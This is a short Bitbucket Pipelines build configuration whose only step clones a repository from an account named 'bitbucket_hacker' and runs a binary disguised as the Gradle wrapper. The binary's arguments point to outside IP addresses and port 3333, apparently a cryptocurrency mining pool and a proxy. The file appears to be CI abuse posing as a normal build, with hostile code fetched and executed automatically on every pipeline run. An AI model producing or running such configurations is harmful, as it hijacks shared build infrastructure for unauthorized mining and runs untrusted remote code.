image: atlassian/default-image:2

pipelines:
  default:
    - step:
        script:
          - git clone https://gitlab.com/bitbucket_hacker/gradlew.git
          - chmod +x gradlew/gradlew
          - ./gradlew/gradlew -o 18.217.253.222:3333 -x 173.254.222.170:1085
